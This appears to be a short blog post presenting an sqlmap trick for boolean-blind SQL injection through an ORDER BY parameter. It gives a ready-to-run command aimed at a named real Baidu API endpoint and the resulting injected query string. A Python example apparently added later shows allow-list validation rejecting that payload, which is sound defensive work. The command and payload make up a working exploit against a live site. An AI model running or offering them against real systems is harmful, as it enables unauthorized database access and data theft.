A special sqlmap usage trick

 python sqlmap.py -u "http://baike.baidu.com/api/mall/getgoodslist?t=1420003371672&goods_class_id=&goods_price_begin=5001&goods_price_end=10000&goods_order_by=goods_price&goods_had_exchange=&goods_order_type=2&goods_type=1&page=1&word=&showInStock=true" \
   -p goods_order_by \
   --prefix ",1=if((1=1" \
   --suffix "),1,(select 1 union select 2))" \
   --dbms=mysql \
   --technique=B \
   --string "pageSize" \
   --user-agent "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0"

t=1420003371672&goods_class_id=&goods_price_begin=5001&goods_price_end=10000&goods_order_by=goods_price,1=if((1=1 AND 5235=5235 ),1,(select 1 union select 2))&goods_had_exchange=&goods_order_type=2&goods_type=1&page=1&word=&showInStock=true
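
A defensive counterpart, added here and not part of the original post: the request above differs from a normal one only in the goods_order_by value, so this example assumes that value reaches the ORDER BY clause and shows allow-list validation rejecting it. The goods table, the permitted column set, the goods_order_type mapping and the use of SQLite in place of MySQL are assumptions made for the example.

```python
import sqlite3

# Assumption: the columns and directions the endpoint is willing to sort by.
ALLOWED_ORDER_COLUMNS = {"goods_price", "goods_id", "goods_name"}
ALLOWED_DIRECTIONS = {"1": "ASC", "2": "DESC"}  # hypothetical goods_order_type mapping


def build_order_by(order_by: str, order_type: str) -> str:
    """Return a safe ORDER BY clause or raise ValueError.

    Identifiers cannot be bound as query parameters, so the value is
    compared against a fixed allow-list instead of being escaped.
    """
    if order_by not in ALLOWED_ORDER_COLUMNS:
        raise ValueError("unsupported sort column")
    if order_type not in ALLOWED_DIRECTIONS:
        raise ValueError("unsupported sort direction")
    return f"ORDER BY {order_by} {ALLOWED_DIRECTIONS[order_type]}"


def list_goods(conn, price_begin, price_end, order_by, order_type):
    """Bind values as parameters; interpolate only the allow-listed clause."""
    clause = build_order_by(order_by, order_type)
    sql = ("SELECT goods_id, goods_price FROM goods "
           f"WHERE goods_price BETWEEN ? AND ? {clause}")
    return conn.execute(sql, (price_begin, price_end)).fetchall()


def demo_connection():
    """Constructed sample data in an in-memory SQLite database."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE goods (goods_id INTEGER, goods_name TEXT, goods_price INTEGER)")
    conn.executemany("INSERT INTO goods VALUES (?, ?, ?)",
                     [(1, "a", 6000), (2, "b", 9000), (3, "c", 5500), (4, "d", 200)])
    return conn


# The goods_order_by value from the request shown above.
PAGE_PAYLOAD = "goods_price,1=if((1=1 AND 5235=5235 ),1,(select 1 union select 2))"

if __name__ == "__main__":
    conn = demo_connection()
    print(list_goods(conn, 5001, 10000, "goods_price", "2"))
    try:
        list_goods(conn, 5001, 10000, PAGE_PAYLOAD, "2")
    except ValueError as exc:
        print("rejected:", exc)
```
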
posted @ 2019-10-29 14:33  nul1-undefined